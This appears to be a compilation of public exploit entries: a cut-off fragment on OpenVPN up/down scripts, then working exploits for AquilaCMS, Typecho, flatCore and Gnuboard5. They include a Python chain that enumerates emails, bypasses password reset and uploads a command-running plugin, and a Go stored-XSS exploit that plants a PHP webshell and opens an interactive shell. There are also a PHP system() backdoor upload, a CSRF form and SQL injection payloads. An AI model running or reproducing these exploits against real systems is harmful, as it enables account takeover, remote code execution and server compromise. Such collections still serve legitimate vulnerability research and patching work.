OpenVPN configuration. This configuration can contain the OpenVPN
paramaters "--up" and "--down", which execute a specified script or
executable. Since the process itself runs with the highest privileges
(root), this allows the device to be completely compromised.
# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573
import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap
def unescape_special_characters(email):
return (
email.replace("[$]", "$")
.replace("[*]", "*")
.replace("[+]", "+")
.replace("[-]", "-")
.replace("[.]", ".")
.replace("[?]", "?")
.replace(r"[\^]", "^")
.replace("[|]", "|")
)
def get_user_emails():
valid_characters = list(
string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~"
) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
emails_found = []
next_emails = ["^"]
while next_emails:
prev_emails = next_emails
next_emails = []
for email in prev_emails:
found = False
for ch in valid_characters:
data = {"email": f"{email + ch}.*"}
res = requests.put(f"{args.url}/api/v2/user", json=data)
if json.loads(res.text)["code"] == "UserAlreadyExist":
next_emails.append(email + ch)
found = True
if not found:
emails_found.append(email[1:])
print(f"[+] {unescape_special_characters(email[1:])}")
return emails_found
def reset_password(email):
data = {"email": email}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
data = {"token": {"$ne": None}, "password": args.password}
requests.post(f"{args.url}/api/v2/user/resetpassword", json=data)
print(f"[+] {unescape_special_characters(email)} : {args.password}")
def get_admin_auth_token(emails):
for email in emails:
data = {"username": email, "password": args.password}
res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data)
if res.status_code == 200:
print(f"[+] Administrator account : {unescape_special_characters(email)}")
return json.loads(res.text)["data"]
return None
def create_plugin(plugin_name):
payload = textwrap.dedent(
f"""
const {{ exec }} = require("child_process");
/**
* This function is called when the plugin is desactivated or when we delete it
*/
module.exports = async function (resolve, reject) {{
try {{
exec("{args.command}");
return resolve();
}} catch (error) {{}}
}};
"""
).strip()
plugin = io.BytesIO()
with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file:
zip_file.writestr(
f"{plugin_name}/package.json",
io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(),
)
zip_file.writestr(
f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue()
)
zip_file.writestr(
f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue()
)
plugin.seek(0)
return plugin
def rce(emails):
auth_token = get_admin_auth_token(emails)
if auth_token is None:
print("[-] Administrator account not found")
return
print("[+] Create malicious plugin")
plugin_name = uuid.uuid4().hex
plugin = create_plugin(plugin_name)
print("[+] Upload plugin")
headers = {"Authorization": auth_token}
files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")}
requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files)
print("[+] Find uploaded plugin")
headers = {"Authorization": auth_token}
data = {"PostBody": {"limit": 0}}
res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data)
plugin_id = None
for data in json.loads(res.text)["datas"]:
if data["name"] == plugin_name:
plugin_id = data["_id"]
print(f"[+] Plugin ID : {plugin_id}")
break
if plugin_id is None:
print("[-] Plugin not found")
return
print("[+] Deactivate plugin")
headers = {"Authorization": auth_token}
data = {"idModule": plugin_id, "active": False}
res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data)
if res.status_code == 200:
print("[+] Command execution succeeded")
else:
print("[-] Command execution failed")
def main():
print("[*] Retrieve email addresses")
emails = get_user_emails()
print("\n[*] Reset password")
for email in emails:
reset_password(email)
print("\n[*] Perform remote code execution")
rce(emails)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-u",
dest="url",
help="Site URL (e.g. www.aquila-cms.com)",
type=str,
required=True,
)
parser.add_argument(
"-p",
dest="password",
help="Password to use for password reset (e.g. HaXX0r3d!)",
type=str,
default="HaXX0r3d!",
)
parser.add_argument(
"-c",
dest="command",
help="Command to execute (e.g. touch /tmp/pwned)",
type=str,
default="touch /tmp/pwned",
)
args = parser.parse_args()
main()
# Exploit Title: Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
# Google Dork: intext:"Powered by Typecho" inurl:/index.php
# Date: 18/08/2024
# Exploit Author: Michele 'cyberaz0r' Di Bonaventura
# Vendor Homepage: https://typecho.org
# Software Link: https://github.com/typecho/typecho
# Version: 1.3.0
# Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho)
# CVE: CVE-2024-35540
# For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/
package main
import (
"bufio"
"bytes"
"crypto/rand"
"crypto/sha256"
"encoding/base64"
"fmt"
"net/http"
"net/url"
"os"
"strings"
"time"
)
var (
postTitle string = "Reflected XSS PoC"
postText string = "Hey admin! Look at the draft of this blog post, can I publish it?"
userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
client *http.Client = &http.Client{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
)
func getEditUrl(u string, cookies string) string {
req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil)
if err != nil {
fmt.Println("[X] Error creating initial request:", err)
return ""
}
req.Header.Set("Cookie", cookies)
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending initial request:", err)
return ""
}
buf := new(bytes.Buffer)
buf.ReadFrom(resp.Body)
body := buf.String()
if !strings.Contains(body, "<form action=\"") {
fmt.Println("[X] Error finding post edit URL")
return ""
}
editUrl := strings.Split(body, "<form action=\"")[1]
editUrl = strings.Split(editUrl, "\"")[0]
return editUrl
}
func generateRandomBytes() string {
bytes := make([]byte, 64)
rand.Read(bytes)
return fmt.Sprintf("%x", sha256.Sum256(bytes))
}
func getJsCode(password string) string {
phpPayload := `
header("X-Random-Token: " . md5(uniqid()));
if (isset($_POST["CSRFToken"]) && $_POST["CSRFToken"] === "%s") {
if (isset($_POST["action"])) {
system($_POST["action"]);
exit;
}
}
`
phpPayload = fmt.Sprintf(phpPayload, password)
jsPayload := `
var i = document.createElement('iframe');
i.src = location.protocol+'//'+location.host+'/admin/theme-editor.php';
i.style.display = 'none';
document.body.appendChild(i);
setTimeout(() => {
var textarea = i.contentWindow.document.getElementById('content');
if (textarea.value.includes(payload))
return;
textarea.value = textarea.value.replace(/<\?php/, '<?php ' + payload);
var form = i.contentWindow.document.getElementById('theme').submit();
}, 200);
`
return fmt.Sprintf("var payload = `%s`;\n%s", phpPayload, jsPayload)
}
func generatePayload(jsCode string) string {
remainder := len(jsCode) % 3
if remainder != 0 {
jsCode += strings.Repeat(" ", 3-remainder)
}
jsCodeEncoded := base64.StdEncoding.EncodeToString([]byte(jsCode))
return fmt.Sprintf("[<img style=\"display:none\" src=x onerror=\"eval(atob('%s'))\">][1]\n[1]: https://google.com", jsCodeEncoded)
}
func createPost(u string, cookies string, payload string) string {
formData := url.Values{}
formData.Set("title", postTitle)
formData.Set("text", payload+"\n"+postText)
formData.Set("do", "save")
formData.Set("markdown", "1")
formData.Set("category%5B%5D", "1")
formData.Set("allowComment", "1")
formData.Set("allowPing", "1")
formData.Set("allowFeed", "1")
formData.Set("dst", "60")
formData.Set("timezone", "7200")
req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
if err != nil {
fmt.Println("[X] Error creating malicious post creation request:", err)
return ""
}
req.Header.Set("Cookie", cookies)
req.Header.Set("User-Agent", userAgent)
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1))
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending malicious post creation request:", err)
return ""
}
defer resp.Body.Close()
return resp.Header.Get("Location")
}
func checkInjected(u string) bool {
req, err := http.NewRequest("HEAD", u, nil)
if err != nil {
return false
}
req.Header.Set("User-Agent", userAgent)
resp, err := client.Do(req)
if err != nil {
return false
}
return resp.Header.Get("X-Random-Token") != ""
}
func readInput() string {
scanner := bufio.NewScanner(os.Stdin)
if scanner.Scan() {
return scanner.Text()
}
return ""
}
func interactiveShell(u string, password string) {
for {
fmt.Print("$ ")
cmd := readInput()
formData := url.Values{}
formData.Set("CSRFToken", password)
formData.Set("action", cmd)
req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode()))
if err != nil {
fmt.Println("[X] Error creating shell request:", err)
continue
}
req.Header.Set("User-Agent", userAgent)
req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode())))
resp, err := client.Do(req)
if err != nil {
fmt.Println("[X] Error sending shell request:", err)
continue
}
buf := new(bytes.Buffer)
buf.ReadFrom(resp.Body)
body := buf.String()
fmt.Println(body)
}
}
func main() {
if len(os.Args) != 3 {
fmt.Println("Usage: go run CVE-2024-35540.go <URL> <COOKIE_HEADER_VALUE>")
os.Exit(1)
}
fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r")
targetUrl := os.Args[1]
cookies := os.Args[2]
fmt.Println("[*] Getting post edit URL with CSRF token...")
editUrl := getEditUrl(targetUrl, cookies)
if editUrl == "" {
fmt.Println("[-] Could not get post edit URL, exiting...")
return
}
fmt.Println("[+] Edit URL:", editUrl)
password := generateRandomBytes()
fmt.Println("[+] Generated password to access the webshell: ", password)
fmt.Println("[*] Generating JavaScript code to inject webshell...")
jsCode := getJsCode(password)
payload := generatePayload(jsCode)
fmt.Println("[*] Creating malicious post...")
postUrl := createPost(editUrl, cookies, payload)
if postUrl == "" || postUrl == "/" {
fmt.Println("[-] Could not create malicious post, exiting...")
return
}
previewUrl := strings.Replace(postUrl, "write-post.php", "preview.php", 1)
fmt.Println("[+] Malicious post created successfully!")
fmt.Println("[i] Send this preview URL to the admin to trigger the XSS:\n" + previewUrl)
fmt.Println("[*] Waiting for the admin to visit the preview URL...")
for !checkInjected(targetUrl) {
time.Sleep(1 * time.Second)
}
fmt.Println("[+] Webshell injected successfully!")
fmt.Println("[+] Enjoy your shell ;)\n")
interactiveShell(targetUrl, password)
}
# Exploit Title: flatCore 1.5 - Cross Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: d3a5168
# Tested on: Ubuntu Windows
# CVE : CVE-2019-13961
PoC:
<!DOCTYPE html>
<html>
<head>
<title>CSRF PoC</title>
</head>
<body>
<form action="http://flatcore3/acp/core/files.upload-script.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="upload_destination" value="../content/files">
<input type="hidden" name="w" value="800">
<input type="hidden" name="h" value="600">
<input type="hidden" name="fz" value="1000">
<input type="hidden" name="unchanged" value="yes">
<input type="file" name="file" value="test.php">
<input type="submit" value="Upload">
</form>
</body>
</html>
[Replace Your Domain Name]
# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: 1.5.5
# Tested on: Ubuntu Windows
# CVE : CVE-2019-10652
PoC:
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream
<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"
../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"
<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
PoC
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability
# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
# Step 2: Upload a malicious PHP file using the file upload feature
# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php
# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
-H "Content-Type: multipart/form-data" \
-F "file=@shell.php" \
-F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
-F "upload_destination=../content/files" \
-F "file_mode=overwrite" \
-b "PHPSESSID=YOUR_SESSION_ID_HERE"
# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"
This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]
# Exploit Title: Gnuboard5 5.3.2.8 - SQL Injection
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/gnuboard/gnuboard5
# Software Link: https://github.com/gnuboard/gnuboard5
# Version: 5.3.2.8
# Tested on: Ubuntu Windows
# CVE : CVE-2020-18662
PoC:
1)
POST /install/install_db.php HTTP/1.1
Host: gnuboard
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)#
result: sleep 5s.
2)
curl -X POST http://gnuboard/install/install_db.php \
-d "mysql_user=root" \
-d "mysql_pass=password" \
-d "mysql_db=gnuboard_db" \
-d "table_prefix=' OR 1=1--"
result: The application does not work.
[Replace Your Domain Name and Replace Database Information]